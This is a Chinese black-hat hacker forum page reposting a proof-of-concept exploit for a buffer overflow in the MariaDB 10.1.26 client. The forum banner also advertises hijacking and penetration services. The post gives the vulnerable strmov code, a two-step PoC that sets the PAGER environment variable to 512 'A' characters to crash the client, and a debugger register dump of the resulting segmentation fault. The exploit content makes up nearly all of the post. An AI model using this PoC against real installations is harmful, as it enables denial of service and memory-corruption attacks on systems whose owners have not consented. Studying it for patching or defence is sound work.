跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

MariaDB Client 10.1.26 - Denial of Service (PoC)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
# Google Dork: None
# Date: 2018-11-16
# Exploit Author: strider
# Software Link: https://github.com/MariaDB/server
# Version: mysql  Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
# CVE : None

# Description:
# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.
# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.

# This is caused by a the function strmov which takes all from source and copy that 
# into destination which have a fixed size.

Codepart:
static char default_pager[FN_REFLEN];

char *tmp=getenv("PAGER");
if (tmp && strlen(tmp))
{
	default_pager_set= 1;
	strmov(default_pager, tmp);
}


Proof of Concept:

Step 1:

export PAGER=$(python -c "print '\x41' * 512")

Step 2:

mariadb -u user -p

Crash

---------------------------------------------------------------------
peda output:

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x555555b73600 ('A' <repeats 200 times>...)
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)
RCX: 0x70 ('p')
RDX: 0x0 
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)
RDI: 0x555555bb0040 
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>:	mov    rax,QWORD PTR [r12])
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>:	movdqu XMMWORD PTR [rdi-0x40],xmm4)
R8 : 0x555555b92580 ('A' <repeats 200 times>...)
R9 : 0x20 (' ')
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0 
R11: 0x7ffff6846d68 --> 0xfff37778fff37768 
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。